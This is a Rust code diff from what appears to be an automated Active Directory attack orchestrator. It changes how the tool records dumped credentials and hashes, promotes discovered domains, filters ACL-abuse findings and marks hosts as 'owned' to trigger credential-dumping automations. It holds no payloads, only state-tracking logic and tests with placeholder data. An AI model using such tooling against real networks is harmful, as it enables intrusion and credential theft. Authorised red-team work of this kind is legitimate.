let state = SharedState::new("op-1".to_string()); + let q = mock_queue(); + + let phantom = Credential { + id: uuid::Uuid::new_v4().to_string(), + username: "bob".to_string(), + password: "P@ssw0rd!".to_string(), + domain: "contoso.local".to_string(), + source: "autologon_registry".to_string(), + discovered_at: None, + is_admin: false, + parent_id: None, + attack_step: 0, + }; + assert!(state.publish_credential(&q, phantom).await.unwrap()); + + let real = Credential { + id: uuid::Uuid::new_v4().to_string(), + username: "bob".to_string(), + password: "P@ssw0rd!".to_string(), + domain: "child.contoso.local".to_string(), + source: "secretsdump".to_string(), + discovered_at: None, + is_admin: false, + parent_id: None, + attack_step: 0, + }; + assert!(state.publish_credential(&q, real).await.unwrap()); + + let s = state.inner.read().await; + // Both stored — a stricter eviction policy could remove the phantom, + // but the priority is to ensure the high-trust record lands in state. + assert!( + s.credentials + .iter() + .any(|c| c.domain == "child.contoso.local" && c.source == "secretsdump"), + "high-trust correct-realm credential must be stored" + ); + } + + #[tokio::test] + async fn publish_credential_equal_trust_both_stored() { + // Two same-source records for the same (user, password) with + // different realms: trust ranking can't disambiguate, so we keep + // both and let downstream realm-strict consumers pick the right one. + let state = SharedState::new("op-1".to_string()); + let q = mock_queue(); + + let a = Credential { + id: uuid::Uuid::new_v4().to_string(), + username: "bob".to_string(), + password: "P@ssw0rd!".to_string(), + domain: "child.contoso.local".to_string(), + source: "autologon_registry".to_string(), + discovered_at: None, + is_admin: false, + parent_id: None, + attack_step: 0, + }; + let b = Credential { + id: uuid::Uuid::new_v4().to_string(), + username: "bob".to_string(), + password: "P@ssw0rd!".to_string(), + domain: "contoso.local".to_string(), + source: "autologon_registry".to_string(), + discovered_at: None, + is_admin: false, + parent_id: None, + attack_step: 0, + }; + assert!(state.publish_credential(&q, a).await.unwrap()); + assert!(state.publish_credential(&q, b).await.unwrap()); + + let s = state.inner.read().await; + assert_eq!(s.credentials.len(), 2); } #[tokio::test] @@ -407,6 +688,23 @@ mod tests { assert!(!state.publish_hash(&q, hash2).await.unwrap()); } + #[tokio::test] + async fn publish_hash_canonicalizes_realm_to_lowercase() { + // Same hash arriving with mixed-case realms (`CONTOSO.LOCAL` from one + // tool, `contoso.local` from another) must not split into two entries. + let state = SharedState::new("op-1".to_string()); + let q = mock_queue(); + + let upper = make_hash("admin", "CONTOSO.LOCAL", "NTLM", "aabbccdd"); + let lower = make_hash("admin", "contoso.local", "NTLM", "aabbccdd"); + assert!(state.publish_hash(&q, upper).await.unwrap()); + assert!(!state.publish_hash(&q, lower).await.unwrap()); + + let s = state.inner.read().await; + assert_eq!(s.hashes.len(), 1); + assert_eq!(s.hashes[0].domain, "contoso.local"); + } + #[tokio::test] async fn publish_krbtgt_hash_sets_domain_admin() { let state = SharedState::new("op-1".to_string()); @@ -426,6 +724,28 @@ mod tests { assert!(s.dominated_domains.contains("contoso.local")); } + #[tokio::test] + async fn publish_krbtgt_hash_mirrors_dominated_to_redis_set() { + // SCARD ares:op::dominated_domains should reflect the in-memory + // set so post-mortem scripts and dashboards see the same view. + let state = SharedState::new("op-mirror".to_string()); + let q = mock_queue(); + { + let mut s = state.inner.write().await; + s.domains.push("contoso.local".to_string()); + } + + let hash = make_hash("krbtgt", "contoso.local", "NTLM", "aabbccdd11223344"); + state.publish_hash(&q, hash).await.unwrap(); + + let mut conn = q.connection(); + let members: std::collections::HashSet = + redis::AsyncCommands::smembers(&mut conn, "ares:op:op-mirror:dominated_domains") + .await + .unwrap(); + assert!(members.contains("contoso.local")); + } + #[tokio::test] async fn update_hash_cracked_password() { let state = SharedState::new("op-1".to_string()); diff --git a/ares-cli/src/orchestrator/state/publishing/domains.rs b/ares-cli/src/orchestrator/state/publishing/domains.rs new file mode 100644 index 00000000..d8396144 --- /dev/null +++ b/ares-cli/src/orchestrator/state/publishing/domains.rs @@ -0,0 +1,451 @@ +//! Domain candidate publishing and promotion. +//! +//! AD discovery tools that we trust (BloodHound, NetExec, runZero) never +//! promote a hostname-derived suffix to an authoritative domain without +//! corroborating evidence. We follow the same rule: hostname-inferred +//! suffixes land in `state.candidate_domains` and only graduate to +//! `state.domains` when they match a stronger source (`TargetConfig`, +//! `DcSelfReport`, `AuthenticatedAd`, `DnsSrv`) or when an external probe +//! confirms them. + +use anyhow::Result; +use chrono::Utc; +use redis::aio::ConnectionLike; +use redis::AsyncCommands; + +use ares_core::models::{CandidateDomain, DomainEvidence}; +use ares_core::state; + +use crate::orchestrator::state::SharedState; +use crate::orchestrator::task_queue::TaskQueueCore; + +use super::looks_like_real_domain; + +/// Retry transient candidate-domain probes on the next worker tick instead of +/// permanently stranding the candidate after one DNS hiccup. +const CANDIDATE_PROBE_RETRY_SECS: i64 = 30; + +/// Result of attempting to publish a discovered domain. +#[derive(Debug, Clone, PartialEq, Eq)] +pub enum DomainPublishOutcome { + /// Domain entered (or was already in) `state.domains`. + Promoted, + /// Recorded as a candidate; awaiting probe or stronger evidence. + Held, + /// Dropped; cannot be a real AD domain. + Rejected(&'static str), +} + +impl SharedState { + /// Publish a discovered domain with provenance. + /// + /// - Drops shapes that are never AD domains (cloud suffixes, default-OS + /// hostnames, bare TLDs, mDNS link-local). + /// - Auto-promotes when `evidence` is authoritative on its own. + /// - For weaker evidence (`HostnameInference`), promotes only if the + /// candidate corroborates an existing strong source — matching the + /// operation's `target.domain` or a domain already in `state.domains`. + /// - Otherwise records the candidate for later confirmation. + pub async fn publish_candidate_domain( + &self, + queue: &TaskQueueCore, + fqdn: impl Into, + evidence: DomainEvidence, + source_host_ip: Option, + ) -> Result { + let fqdn = fqdn.into().trim().trim_end_matches('.').to_lowercase(); + if !looks_like_real_domain(&fqdn) { + tracing::debug!( + fqdn = %fqdn, + ?evidence, + "Rejected candidate domain (cheap pre-filter)" + ); + return Ok(DomainPublishOutcome::Rejected("not a plausible AD domain")); + } + + // Authoritative evidence promotes immediately. + if evidence.is_authoritative() { + self.promote_domain(queue, &fqdn).await?; + tracing::info!(domain = %fqdn, ?evidence, "Promoted authoritative domain"); + return Ok(DomainPublishOutcome::Promoted); + } + + // Weaker evidence — check for corroboration before promoting. + let corroborated = { + let state = self.inner.read().await; + let already_known = state.domains.iter().any(|d| d.eq_ignore_ascii_case(&fqdn)); + let matches_target = state + .target + .as_ref() + .map(|t| t.domain.eq_ignore_ascii_case(&fqdn)) + .unwrap_or(false); + already_known || matches_target + }; + + if corroborated { + self.promote_domain(queue, &fqdn).await?; + tracing::info!( + domain = %fqdn, + ?evidence, + "Promoted candidate domain (corroborated by target/known domain)" + ); + return Ok(DomainPublishOutcome::Promoted); + } + + // Hold as a candidate for the probe worker to evaluate. + let mut candidate = CandidateDomain::new(&fqdn, evidence); + if let Some(ip) = source_host_ip { + candidate = candidate.with_source(ip); + } + self.record_candidate(queue, candidate).await?; + Ok(DomainPublishOutcome::Held) + } + + /// Insert the domain into authoritative state. Idempotent. + pub(crate) async fn promote_domain( + &self, + queue: &TaskQueueCore, + fqdn: &str, + ) -> Result<()> { + let fqdn_lower = fqdn.to_lowercase(); + let op_id = self.inner.read().await.operation_id.clone(); + let mut state = self.inner.write().await; + // Drop any existing candidate row — promotion supersedes it. + state.candidate_domains.remove(&fqdn_lower); + if state + .domains + .iter() + .any(|d| d.eq_ignore_ascii_case(&fqdn_lower)) + { + return Ok(()); + } + state.domains.push(fqdn_lower.clone()); + drop(state); + + let domain_key = format!("{}:{}:{}", state::KEY_PREFIX, op_id, state::KEY_DOMAINS); + let candidate_key = format!( + "{}:{}:{}", + state::KEY_PREFIX, + op_id, + state::KEY_CANDIDATE_DOMAINS + ); + let mut conn = queue.connection(); + let _: Result<(), _> = conn.sadd(&domain_key, &fqdn_lower).await; + let _: Result<(), _> = conn.expire(&domain_key, 86400i64).await; + let _: Result<(), _> = conn.hdel(&candidate_key, &fqdn_lower).await; + Ok(()) + } + + /// Snapshot of candidate domains awaiting probe. Returns FQDNs in + /// arbitrary order; callers should not rely on ordering. + pub async fn pending_candidate_domains(&self) -> Vec { + let now = Utc::now(); + let state = self.inner.read().await; + state + .candidate_domains + .values() + .filter(|c| { + if c.confirmed { + return false; + } + if !c.probed { + return true; + } + c.last_probed_at + .map(|ts| (now - ts).num_seconds() >= CANDIDATE_PROBE_RETRY_SECS) + .unwrap_or(true) + }) + .cloned() + .collect() + } + + /// Mark a candidate as probed without promoting it (e.g. probe was + /// indeterminate but the worker wants to back off retries). Persists the + /// updated row so it survives orchestrator restart. + pub async fn mark_candidate_probed( + &self, + queue: &TaskQueueCore, + fqdn: &str, + ) -> Result<()> { + let fqdn_lower = fqdn.to_lowercase(); + let (op_id, candidate_json) = { + let mut state = self.inner.write().await; + let candidate = match state.candidate_domains.get_mut(&fqdn_lower) { + Some(c) => c, + None => return Ok(()), + }; + candidate.probed = true; + candidate.last_probed_at = Some(Utc::now()); + candidate.probe_failures = candidate.probe_failures.saturating_add(1); + let json = serde_json::to_string(candidate).unwrap_or_default(); + (state.operation_id.clone(), json) + }; + let key = format!( + "{}:{}:{}", + state::KEY_PREFIX, + op_id, + state::KEY_CANDIDATE_DOMAINS + ); + let mut conn = queue.connection(); + let _: Result<(), _> = conn.hset(&key, &fqdn_lower, &candidate_json).await; + Ok(()) + } + + /// Drop a rejected candidate from in-memory + Redis. Idempotent. + pub async fn drop_candidate_domain( + &self, + queue: &TaskQueueCore, + fqdn: &str, + ) -> Result<()> { + let fqdn_lower = fqdn.to_lowercase(); + let op_id = { + let mut state = self.inner.write().await; + state.candidate_domains.remove(&fqdn_lower); + state.operation_id.clone() + }; + let key = format!( + "{}:{}:{}", + state::KEY_PREFIX, + op_id, + state::KEY_CANDIDATE_DOMAINS + ); + let mut conn = queue.connection(); + let _: Result<(), _> = conn.hdel(&key, &fqdn_lower).await; + Ok(()) + } + + /// Persist a candidate domain to in-memory + Redis without promoting it. + async fn record_candidate( + &self, + queue: &TaskQueueCore, + candidate: CandidateDomain, + ) -> Result<()> { + let op_id = self.inner.read().await.operation_id.clone(); + let key = format!( + "{}:{}:{}", + state::KEY_PREFIX, + op_id, + state::KEY_CANDIDATE_DOMAINS + ); + let json = serde_json::to_string(&candidate).unwrap_or_default(); + let fqdn = candidate.fqdn.clone(); + + { + let mut state = self.inner.write().await; + // Don't overwrite a previously-probed candidate with a fresh one. + if state.candidate_domains.contains_key(&fqdn) { + return Ok(()); + } + state.candidate_domains.insert(fqdn.clone(), candidate); + } + + tracing::debug!(domain = %fqdn, "Recorded candidate domain (awaiting probe)"); + let mut conn = queue.connection(); + let _: Result<(), _> = conn.hset(&key, &fqdn, &json).await; + let _: Result<(), _> = conn.expire(&key, 86400i64).await; + Ok(()) + } +} + +#[cfg(test)] +mod tests { + use super::*; + use crate::orchestrator::state::SharedState; + use crate::orchestrator::task_queue::TaskQueueCore; + use ares_core::models::Target; + use ares_core::state::mock_redis::MockRedisConnection; + use chrono::Duration; + + fn mock_queue() -> TaskQueueCore { + TaskQueueCore::from_connection(MockRedisConnection::new()) + } + + #[tokio::test] + async fn authoritative_evidence_promotes_immediately() { + let state = SharedState::new("op-1".into()); + let q = mock_queue(); + let outcome = state + .publish_candidate_domain(&q, "contoso.local", DomainEvidence::DcSelfReport, None) + .await + .unwrap(); + assert_eq!(outcome, DomainPublishOutcome::Promoted); + let s = state.inner.read().await; + assert!(s.domains.iter().any(|d| d == "contoso.local")); + assert!(s.candidate_domains.is_empty()); + } + + #[tokio::test] + async fn hostname_inference_held_without_corroboration() { + let state = SharedState::new("op-1".into()); + let q = mock_queue(); + let outcome = state + .publish_candidate_domain( + &q, + "unknown.example.com", + DomainEvidence::HostnameInference, + Some("192.168.58.5".into()), + ) + .await + .unwrap(); + assert_eq!(outcome, DomainPublishOutcome::Held); + let s = state.inner.read().await; + assert!(s.domains.is_empty()); + assert!(s.candidate_domains.contains_key("unknown.example.com")); + } + + #[tokio::test] + async fn hostname_inference_promotes_when_matches_target() { + let state = SharedState::new("op-1".into()); + let q = mock_queue(); + { + let mut s = state.inner.write().await; + s.target = Some(Target { + ip: "192.168.58.10".into(), + hostname: String::new(), + domain: "contoso.local".into(), + environment: String::new(), + }); + } + let outcome = state + .publish_candidate_domain(&q, "contoso.local", DomainEvidence::HostnameInference, None) + .await + .unwrap(); + assert_eq!(outcome, DomainPublishOutcome::Promoted); + } + + #[tokio::test] + async fn hostname_inference_promotes_when_already_known() { + let state = SharedState::new("op-1".into()); + let q = mock_queue(); + { + let mut s = state.inner.write().await; + s.domains.push("contoso.local".into()); + } + let outcome = state + .publish_candidate_domain(&q, "contoso.local", DomainEvidence::HostnameInference, None) + .await + .unwrap(); + assert_eq!(outcome, DomainPublishOutcome::Promoted); + } + + #[tokio::test] + async fn rejects_default_windows_oobe_fqdn() { + let state = SharedState::new("op-1".into()); + let q = mock_queue(); + let outcome = state + .publish_candidate_domain( + &q, + "win-hvtt4f8yn5n.ttb0.local", + DomainEvidence::HostnameInference, + None, + ) + .await + .unwrap(); + assert!(matches!(outcome, DomainPublishOutcome::Rejected(_))); + let s = state.inner.read().await; + assert!(s.domains.is_empty()); + assert!(s.candidate_domains.is_empty()); + } + + #[tokio::test] + async fn rejects_aws_internal_suffix() { + let state = SharedState::new("op-1".into()); + let q = mock_queue(); + let outcome = state + .publish_candidate_domain( + &q, + "us-west-2.compute.internal", + DomainEvidence::HostnameInference, + None, + ) + .await + .unwrap(); + assert!(matches!(outcome, DomainPublishOutcome::Rejected(_))); + } + + #[tokio::test] + async fn rejects_bare_local_tld() { + let state = SharedState::new("op-1".into()); + let q = mock_queue(); + let outcome = state + .publish_candidate_domain(&q, "local", DomainEvidence::HostnameInference, None) + .await + .unwrap(); + assert!(matches!(outcome, DomainPublishOutcome::Rejected(_))); + } + + #[tokio::test] + async fn rejects_bonjour_localhost_suffix() { + let state = SharedState::new("op-1".into()); + let q = mock_queue(); + let outcome = state + .publish_candidate_domain( + &q, + "bobs-mac.localhost", + DomainEvidence::HostnameInference, + None, + ) + .await + .unwrap(); + assert!(matches!(outcome, DomainPublishOutcome::Rejected(_))); + } + + #[tokio::test] + async fn promote_drops_existing_candidate_row() { + let state = SharedState::new("op-1".into()); + let q = mock_queue(); + // Seed a candidate, then publish authoritatively for the same name. + state + .publish_candidate_domain(&q, "contoso.local", DomainEvidence::HostnameInference, None) + .await + .unwrap(); + // No corroboration yet → held as candidate. + { + let s = state.inner.read().await; + assert!(s.candidate_domains.contains_key("contoso.local")); + } + // Now an authoritative source confirms it. + state + .publish_candidate_domain(&q, "contoso.local", DomainEvidence::DcSelfReport, None) + .await + .unwrap(); + let s = state.inner.read().await; + assert!(s.domains.iter().any(|d| d == "contoso.local")); + assert!(!s.candidate_domains.contains_key("contoso.local")); + } + + #[tokio::test] + async fn transient_probe_candidates_become_pending_again_after_cooldown() { + let state = SharedState::new("op-1".into()); + let q = mock_queue(); + state + .publish_candidate_domain( + &q, + "transient.example.com", + DomainEvidence::HostnameInference, + None, + ) + .await + .unwrap(); + state + .mark_candidate_probed(&q, "transient.example.com") + .await + .unwrap(); + { + let pending = state.pending_candidate_domains().await; + assert!(pending.is_empty()); + } + { + let mut s = state.inner.write().await; + let cand = s + .candidate_domains + .get_mut("transient.example.com") + .unwrap(); + cand.last_probed_at = + Some(Utc::now() - Duration::seconds(CANDIDATE_PROBE_RETRY_SECS + 1)); + } + let pending = state.pending_candidate_domains().await; + assert_eq!(pending.len(), 1); + assert_eq!(pending[0].fqdn, "transient.example.com"); + } +} diff --git a/ares-cli/src/orchestrator/state/publishing/entities.rs b/ares-cli/src/orchestrator/state/publishing/entities.rs index 246468ff..330c6833 100644 --- a/ares-cli/src/orchestrator/state/publishing/entities.rs +++ b/ares-cli/src/orchestrator/state/publishing/entities.rs @@ -8,6 +8,7 @@ use ares_core::state::{self, RedisStateReader}; use redis::aio::ConnectionLike; +use crate::dedup::is_ghost_machine_account; use crate::orchestrator::state::{SharedState, KEY_VULN_QUEUE}; use crate::orchestrator::task_queue::TaskQueueCore; @@ -101,6 +102,16 @@ impl SharedState { mut vuln: VulnerabilityInfo, strategy: Option<&crate::orchestrator::strategy::Strategy>, ) -> Result { + if should_drop_ghost_acl_vulnerability(&vuln) { + tracing::debug!( + vuln_id = %vuln.vuln_id, + vuln_type = %vuln.vuln_type, + target = %vuln.target, + "Dropping ghost-machine ACL vulnerability" + ); + return Ok(false); + } + // Apply strategy weight override if provided if let Some(strategy_cfg) = strategy { let effective = strategy_cfg.effective_priority(&vuln.vuln_type); @@ -335,6 +346,42 @@ fn are_in_same_forest(a: &str, b: &str) -> bool { a.ends_with(&format!(".{b}")) || b.ends_with(&format!(".{a}")) } +fn should_drop_ghost_acl_vulnerability(vuln: &VulnerabilityInfo) -> bool { + if !is_acl_style_vulnerability(&vuln.vuln_type) { + return false; + } + + ghost_machine_target(vuln) +} + +fn is_acl_style_vulnerability(vuln_type: &str) -> bool { + let vtype = vuln_type.trim().to_lowercase(); + matches!( + vtype.as_str(), + "genericall" + | "genericwrite" + | "writedacl" + | "writeowner" + | "writeproperty" + | "allextendedrights" + | "self_membership" + | "write_membership" + | "genericall_computer" + | "genericwrite_computer" + ) || vtype.contains("forcechangepassword") +} + +fn ghost_machine_target(vuln: &VulnerabilityInfo) -> bool { + if is_ghost_machine_account(&vuln.target) { + return true; + } + + ["target", "target_computer", "target_account"] + .into_iter() + .filter_map(|key| vuln.details.get(key).and_then(|v| v.as_str())) + .any(is_ghost_machine_account) +} + #[cfg(test)] mod tests { use super::*; @@ -372,6 +419,24 @@ mod tests { } } + fn make_vuln_with_details( + vuln_id: &str, + vuln_type: &str, + target: &str, + details: HashMap, + ) -> VulnerabilityInfo { + VulnerabilityInfo { + vuln_id: vuln_id.to_string(), + vuln_type: vuln_type.to_string(), + target: target.to_string(), + discovered_by: "test".to_string(), + discovered_at: Utc::now(), + details, + recommended_agent: "exploit".to_string(), + priority: 50, + } + } + fn make_share(host: &str, name: &str) -> Share { Share { host: host.to_string(), @@ -504,6 +569,47 @@ mod tests { assert_eq!(s.discovered_vulnerabilities.len(), 1); } + #[tokio::test] + async fn publish_vulnerability_rejects_ghost_acl_target() { + let state = SharedState::new("op-1".to_string()); + let q = mock_queue(); + + let vuln = make_vuln("VULN-ACL-001", "allextendedrights", "WIN-DPPJMLU3XS6$"); + let added = state.publish_vulnerability(&q, vuln).await.unwrap(); + assert!(!added); + + let s = state.inner.read().await; + assert!(s.discovered_vulnerabilities.is_empty()); + } + + #[tokio::test] + async fn publish_vulnerability_rejects_ghost_acl_target_in_details() { + let state = SharedState::new("op-1".to_string()); + let q = mock_queue(); + + let mut details = HashMap::new(); + details.insert("target".to_string(), serde_json::json!("WIN-DPPJMLU3XS6$")); + let vuln = make_vuln_with_details("VULN-ACL-002", "genericall", "placeholder", details); + let added = state.publish_vulnerability(&q, vuln).await.unwrap(); + assert!(!added); + + let s = state.inner.read().await; + assert!(s.discovered_vulnerabilities.is_empty()); + } + + #[tokio::test] + async fn publish_vulnerability_keeps_real_acl_machine_target() { + let state = SharedState::new("op-1".to_string()); + let q = mock_queue(); + + let vuln = make_vuln("VULN-ACL-003", "genericall", "DC01$"); + let added = state.publish_vulnerability(&q, vuln).await.unwrap(); + assert!(added); + + let s = state.inner.read().await; + assert!(s.discovered_vulnerabilities.contains_key("VULN-ACL-003")); + } + #[tokio::test] async fn publish_share_adds_to_state() { let state = SharedState::new("op-1".to_string()); diff --git a/ares-cli/src/orchestrator/state/publishing/hosts.rs b/ares-cli/src/orchestrator/state/publishing/hosts.rs index a3923601..f96c7b85 100644 --- a/ares-cli/src/orchestrator/state/publishing/hosts.rs +++ b/ares-cli/src/orchestrator/state/publishing/hosts.rs @@ -3,7 +3,7 @@ use anyhow::Result; use redis::AsyncCommands; -use ares_core::models::Host; +use ares_core::models::{DomainEvidence, Host}; use ares_core::state::{self, RedisStateReader}; use redis::aio::ConnectionLike; @@ -11,15 +11,16 @@ use redis::aio::ConnectionLike; use crate::orchestrator::state::SharedState; use crate::orchestrator::task_queue::TaskQueueCore; -use super::is_aws_hostname; +use super::{looks_like_real_domain, strip_netexec_artifact}; impl SharedState { /// Add a host to state and Redis. /// /// Merges data when a host with the same IP already exists: upgrades DC - /// status, fills in hostname, and keeps the richer service list. - /// AWS internal hostnames (e.g. `ip-10-1-2-150.us-west-2.compute.internal`) - /// are stripped to allow real AD FQDNs to take precedence. + /// status, fills in hostname, and keeps the richer service list. Hostnames + /// that can't be a real AD FQDN — cloud PTRs, default-OS auto-names, + /// mDNS, bare TLDs — are cleared via `looks_like_real_domain` so a real + /// FQDN can take precedence later. /// /// When the hostname is a valid AD FQDN (e.g. `dc01.contoso.local`), the /// domain suffix is automatically extracted and added to `state.domains` @@ -29,43 +30,35 @@ impl SharedState { queue: &TaskQueueCore, host: Host, ) -> Result { - // Normalize hostname: strip trailing dots and AWS internal names + // NetExec sometimes appends "0." to domain names (e.g. + // "dc01.contoso.local0." → "dc01.contoso.local"). Strip that, then + // drop any multi-label hostname that fails the unified shape filter. let mut host = host; - host.hostname = host.hostname.trim_end_matches('.').to_lowercase(); - if is_aws_hostname(&host.hostname) { + host.hostname = strip_netexec_artifact(&host.hostname).to_lowercase(); + if host.hostname.contains('.') && !looks_like_real_domain(&host.hostname) { host.hostname = String::new(); } - // Auto-extract domain from FQDN hostname (matches Python add_host) - // e.g. "dc02.child.contoso.local" → "child.contoso.local" - if !host.hostname.is_empty() - && host.hostname.contains('.') - && !is_aws_hostname(&host.hostname) - { + // Auto-extract domain from FQDN hostname (matches Python add_host). + // e.g. "dc02.child.contoso.local" → "child.contoso.local". Routed + // through the candidate-domain pipeline: a hostname split alone is + // weak evidence and won't reach `state.domains` unless a stronger + // source (target config, DC self-report, probe) confirms it. + if looks_like_real_domain(&host.hostname) { let hostname_clean = host.hostname.trim_end_matches('.'); let parts: Vec<&str> = hostname_clean.split('.').collect(); if parts.len() >= 3 { let domain = parts[1..].join(".").to_lowercase(); - // Reject AWS/cloud domains - if !domain.contains("compute.internal") && !domain.contains("amazonaws.com") { - let op_id = self.inner.read().await.operation_id.clone(); - let mut state = self.inner.write().await; - if !state.domains.contains(&domain) { - state.domains.push(domain.clone()); - let domain_key = - format!("{}:{}:{}", state::KEY_PREFIX, op_id, state::KEY_DOMAINS,); - let mut conn = queue.connection(); - let _: Result<(), _> = - redis::AsyncCommands::sadd(&mut conn, &domain_key, &domain).await; - let _: Result<(), _> = - redis::AsyncCommands::expire(&mut conn, &domain_key, 86400i64).await; - tracing::info!( - hostname = %host.hostname, - domain = %domain, - "Auto-extracted domain from host FQDN" - ); - } - } + // A DC FQDN is the DC self-reporting its own domain — strong + // enough to bypass the candidate hold. + let evidence = if host.is_dc || host.detect_dc() { + DomainEvidence::DcSelfReport + } else { + DomainEvidence::HostnameInference + }; + let _ = self + .publish_candidate_domain(queue, &domain, evidence, Some(host.ip.clone())) + .await; // Auto-populate netbios_to_fqdn map so CLI can resolve short names. // e.g. "dc02.child.contoso.local" → DC02 → dc02.child.contoso.local @@ -102,19 +95,30 @@ impl SharedState { } let new_is_dc = host.is_dc || host.detect_dc(); let was_dc = existing.is_dc; - let had_hostname = !existing.hostname.is_empty(); + let had_fqdn = existing.hostname.contains('.'); let mut changed = false; if new_is_dc && !existing.is_dc { existing.is_dc = true; changed = true; } - // Strip AWS hostname from existing entry too - if is_aws_hostname(&existing.hostname) { + // Drop unusable hostnames on the existing entry too so a + // later real FQDN merge can replace them. + if existing.hostname.contains('.') && !looks_like_real_domain(&existing.hostname) { existing.hostname = String::new(); changed = true; } - if !host.hostname.is_empty() && existing.hostname.is_empty() { + // Upgrade short name to FQDN when a better hostname arrives. + // Without this, the short name (e.g. "dc01") sticks + // and `register_dc` can't derive a domain from it, which + // forces the ambiguous fallback path and mis-maps DCs. + let upgrade_to_fqdn = host.hostname.contains('.') + && !existing.hostname.contains('.') + && host + .hostname + .to_lowercase() + .starts_with(&format!("{}.", existing.hostname.to_lowercase())); + if (!host.hostname.is_empty() && existing.hostname.is_empty()) || upgrade_to_fqdn { existing.hostname = host.hostname.clone(); changed = true; } @@ -138,11 +142,11 @@ impl SharedState { } // Re-register DC if it just became a DC, or if its hostname - // was just filled in (so we can correct the domain mapping). + // was upgraded to (or first set to) an FQDN — that's when we + // can finally derive the correct domain instead of guessing. let is_dc_now = existing.is_dc; - let has_hostname_now = !existing.hostname.is_empty(); - let needs_dc = - (is_dc_now && !was_dc) || (is_dc_now && has_hostname_now && !had_hostname); + let has_fqdn_now = existing.hostname.contains('.'); + let needs_dc = (is_dc_now && !was_dc) || (is_dc_now && has_fqdn_now && !had_fqdn); (needs_dc, true) } else { // No existing host — will be added below @@ -252,12 +256,14 @@ impl SharedState { queue: &TaskQueueCore, host: &Host, ) -> Result<()> { - // Require at least 3 dot-separated parts (e.g. dc03.contoso.local) - // so 2-part hostnames like "HOSTNAME.local" don't yield "local" as the domain. - let raw_domain = if !host.hostname.is_empty() { + // `looks_like_real_domain` enforces the unified hostname-shape rules + // (cloud PTRs, default-OS auto-names, mDNS, bare TLDs). After it + // passes, also require ≥3 dot-separated parts so 2-label names like + // `DC01.local` don't yield `local` as the AD domain. + let derived = if looks_like_real_domain(&host.hostname) { let parts: Vec<&str> = host.hostname.split('.').collect(); if parts.len() >= 3 { - parts[1..].join(".") + parts[1..].join(".").to_lowercase() } else { String::new() } @@ -265,35 +271,54 @@ impl SharedState { String::new() }; - // If we can't derive a domain from the hostname, fall back to the - // target domain already in state. This unblocks automation for DCs - // discovered before their FQDN is resolved. - let raw_domain = if raw_domain.is_empty() - || raw_domain.contains("compute.internal") - || raw_domain.contains("amazonaws.com") - { + // The DC's own FQDN is a self-report — strongest evidence we have + // short of a CLDAP probe. Push it through `publish_candidate_domain` + // so cloud / default-OS shapes are filtered consistently with other + // discovery paths. + let mut domain = String::new(); + if !derived.is_empty() { + let outcome = self + .publish_candidate_domain( + queue, + derived.clone(), + DomainEvidence::DcSelfReport, + Some(host.ip.clone()), + ) + .await?; + if matches!(outcome, super::DomainPublishOutcome::Promoted) { + domain = derived; + } + } + + // If the FQDN was unusable (missing, rejected, or short), fall back to + // the sole known authoritative domain. With ≥2 domains, "first" is a + // guess that mis-maps DCs to the wrong domain — that bad mapping + // survives later cleanup since `register_dc` only purges stale entries + // by IP, so a subsequent correct registration with a *different* IP + // can't dislodge the wrong (domain, ip) pair. Skip and let the next + // FQDN-bearing discovery populate the entry. + if domain.is_empty() { let state = self.inner.read().await; - if let Some(fallback) = state.domains.first().cloned() { + if state.domains.len() == 1 { + let fallback = state.domains[0].clone(); tracing::info!( ip = %host.ip, hostname = %host.hostname, fallback_domain = %fallback, - "DC registration: using fallback domain (no FQDN available)" + "DC registration: using fallback domain (no usable FQDN)" ); - fallback + domain = fallback; } else { tracing::debug!( ip = %host.ip, hostname = %host.hostname, - "Skipping DC registration: no FQDN and no fallback domain in state" + known_domains = state.domains.len(), + "Skipping DC registration: no usable FQDN and ambiguous fallback domain" ); return Ok(()); } - } else { - raw_domain - }; + } - let domain = raw_domain; let domain_lower = domain.to_lowercase(); let mut conn = queue.connection(); @@ -318,31 +343,18 @@ impl SharedState { ); let _: () = conn.hdel(&dc_key, stale).await?; } - // Remove stale entries from state (done below under write lock) } let _: () = conn.hset(&dc_key, &domain_lower, &host.ip).await?; - // Add domain to state and Redis, correct stale mappings let mut state = self.inner.write().await; - - // Remove stale domain → IP mappings for this IP state .domain_controllers .retain(|d, ip| !(ip == &host.ip && *d != domain_lower)); - - // Insert or update the mapping state .domain_controllers .insert(domain_lower.clone(), host.ip.clone()); - if !state.domains.contains(&domain_lower) { - state.domains.push(domain_lower.clone()); - let domain_key = format!("{}:{}:{}", state::KEY_PREFIX, op_id, state::KEY_DOMAINS); - let _: () = conn.sadd(&domain_key, &domain_lower).await?; - let _: () = conn.expire(&domain_key, 86400).await?; - } - tracing::info!( ip = %host.ip, domain = %domain_lower, @@ -351,6 +363,74 @@ impl SharedState { Ok(()) } + + /// Mark a host as owned (admin access confirmed). + /// + /// This persists the owned flag to both in-memory state and Redis so + /// that automations like `auto_lsassy_dump` and `credential_expansion` + /// can react to host ownership changes. + pub async fn mark_host_owned( + &self, + queue: &TaskQueueCore, + ip: &str, + ) -> Result<()> { + let (host_json, op_id) = { + let mut state = self.inner.write().await; + let host = state.hosts.iter_mut().find(|h| h.ip == ip); + if let Some(h) = host { + if h.owned { + return Ok(()); // already owned + } + h.owned = true; + tracing::info!(ip = %ip, hostname = %h.hostname, "Host marked as owned"); + let json = serde_json::to_string(h).unwrap_or_default(); + (json, state.operation_id.clone()) + } else { + // Host not yet in state — create a minimal entry so downstream + // automations (lsassy_dump, credential_expansion) can fire. + // This happens when secretsdump succeeds before host discovery. + let new_host = Host { + ip: ip.to_string(), + hostname: ip.to_string(), // will be enriched by later discovery + os: String::new(), + roles: Vec::new(), + services: Vec::new(), + is_dc: state.domain_controllers.values().any(|dc| dc == ip), + owned: true, + }; + tracing::info!(ip = %ip, "Host not in state — creating owned entry"); + let json = serde_json::to_string(&new_host).unwrap_or_default(); + let op_id = state.operation_id.clone(); + state.hosts.push(new_host); + (json, op_id) + } + }; + + // Persist to Redis + let host_key = format!("{}:{}:{}", state::KEY_PREFIX, op_id, state::KEY_HOSTS); + let mut conn = queue.connection(); + let entries: Vec = redis::AsyncCommands::lrange(&mut conn, &host_key, 0, -1) + .await + .unwrap_or_default(); + let mut found = false; + for (idx, entry) in entries.iter().enumerate() { + if let Ok(existing) = serde_json::from_str::(entry) { + if existing.ip == ip { + let _: Result<(), _> = + redis::AsyncCommands::lset(&mut conn, &host_key, idx as isize, &host_json) + .await; + found = true; + break; + } + } + } + if !found { + // New host entry — append to Redis list + let _: Result<(), _> = + redis::AsyncCommands::rpush(&mut conn, &host_key, &host_json).await; + } + Ok(()) + } } #[cfg(test)] 